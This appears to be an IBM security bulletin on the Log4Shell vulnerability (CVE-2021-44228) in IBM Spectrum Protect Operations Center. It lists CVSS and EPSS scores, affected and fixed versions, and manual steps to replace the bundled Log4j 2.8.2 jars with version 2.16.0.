10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
99.9%
A vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the Help system in IBM Spectrum Protect Operations Center.
CVEID:CVE-2021-44228
**DESCRIPTION:**Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.
CVSS Base score: 10
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214921 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Affected Product(s) | Version(s) |
---|---|
IBM Spectrum Protect Operations Center | 8.1.0.000-8.1.13.000 |
7.1.0.000-7.1.14.000 |
IBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations section.
Note: The below fix packages included Log4j 2.16.
_IBM Spectrum Protect Operations Center Affected Versions
_|Fixing
Level|Platform|_Link to Fix and Instructions
_
—|—|—|—
8.1.0.000-8.1.13.000|
8.1.13.100| AIX
Linux
Windows|
<https://www.ibm.com/support/pages/node/6527288>
7.1.0.000-7.1.14.000
| 7.1.14.100| AIX
Linux
Windoes| <https://www.ibm.com/support/pages/node/6527284>
Manual Procedure to Update the Help system
The Help system shipped along with the Operations Center includes the affected log4j versions. To manually update the Help system:
1. Download the following from Apache:
Apache Log4j 2 binary(zip) apache-log4j-2.16.0-bin.zip
https://logging.apache.org/log4j/2.0/download.html
2. Stop the Operations Center service (which also stops the Help system)
AIX - /opt/tivoli/tsm/ui/utils/stopserver.sh
Linux -
8.1.9 and Lower (including v7) - service opscenter.rc stop
8.1.10 and higher - systemctl stop opscenter.service
Windows - From the Services window, stop the IBM Spectrum® Protect Operations Center service.
4. Unzip the apache-log4j-2.16.0-bin.zip
5. From the unzipped directory apache-log4j-2.16.0-bin copy the log4j2.16 jars and remove the earlier ones
6. From
AIX and Linux - /opt/tivoli/tsm/ui/Liberty/usr/servers/guiServer/apps/TSM_HELP.war/WEB-INF/lib/
Windows - c:\Program Files\Tivoli\TSM\\ui\Liberty\usr\servers\guiServer\apps/TSM_HELP.war/WEB-INF/lib\
Replace:
log4j-api-2.8.2.jar
log4j-1.2-api-2.8.2.jar
log4j-core-2.8.2.jar
log4j-slf4j-impl-2.8.2.jar
with
log4j-api-2.16.0.jar
log4j-1.2-api-2.16.0.jar
log4j-core-2.16.0.jar
log4j-slf4j-impl-2.16.0.jar
7. Restart OC service
AIX - /opt/tivoli/tsm/ui/utils/startserver.sh
Linux -
8.1.9 and Lower (including v7) - service opscenter.rc start
8.1.10 and higher - systemctl start opscenter.service
Windows - From the Services window, start the IBM Spectrum® Protect Operations Center service.
CPE | Name | Operator | Version |
---|---|---|---|
ibm spectrum protect extended edition | eq | 8.1 | |
ibm spectrum protect extended edition | eq | 7.1 |
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
99.9%